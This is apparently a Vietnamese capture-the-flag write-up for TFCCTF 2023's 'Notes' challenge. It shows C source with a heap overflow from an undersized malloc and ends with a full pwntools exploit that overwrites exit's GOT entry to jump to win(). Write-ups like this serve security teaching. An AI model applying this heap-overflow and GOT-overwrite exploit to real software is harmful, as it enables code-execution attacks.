🍑Notes - TFCCTF2023

Source

29KB

notes

2KB

notes.c

Analysis

Đọc qua source code 1 hồi tôi thấy được 1 phần không kiểm tra input:

#define CONTENT_MAX (long long)256   // <--- here
...
note_t* add() {
    note_t* note = malloc(sizeof(note_t));
    note->content = malloc(sizeof(CONTENT_MAX));  //<--- here
    printf("content> \n");
    fgets(note->content, sizeof(CONTENT_MAX), stdin);
    return note;
}
void edit(note_t* note) {
    printf("content> \n");
    fgets(note->content, CONTENT_MAX, stdin);  // <---- here
}

Tôi đoán bài này sẽ ghi đè vào những phần dữ liệu nhảy cảm trên bộ nhớ heap và có thể chỉnh sửa tùy theo ý muốn.

Set break point tại add() và edit()

Đúng như tôi dự đoán ban đầu

Nhưng làm sao để win được bài này?

Cách duy nhất là GOT overrite thằng exit@plt ---> win()

Test:

ban đầu tôi gửi như bình thường 2 index 0 và 1 sau đó tôi sửa và gửi lại 1 đoạn dữ liệu lên index 0 trong heap

Sau khi tôi gửi tiếp lần nữa ở index 1 thì nhận được lỗi trên. Thay thế dòng chữ "Kinabler" --> thành got của exit và sau đó edit lại ở index1 và gửi lên địa chỉ của hàm win. Tôi được kết quả như sau:

Full payload:

from pwn import *
elf = context.binary = ELF("./notes")
r = elf.process()
gdb.attach(r, '''
    b* main+313\n
    b* edit\n
    c
''')
def add(index):
    r.sendline(str(1))
    r.sendline(str(index))
    r.sendline(b"AA")

def edit(index, payload:bytes):
    r.sendline(str(2))
    r.sendline(str(index))
    r.sendline(payload)

add(0)
add(1)
payload = b"A" * 0x20 + p64(elf.got["exit"])
edit(0, payload)
edit(1, p64(elf.sym.win))
r.sendline(str(0))
r.interactive()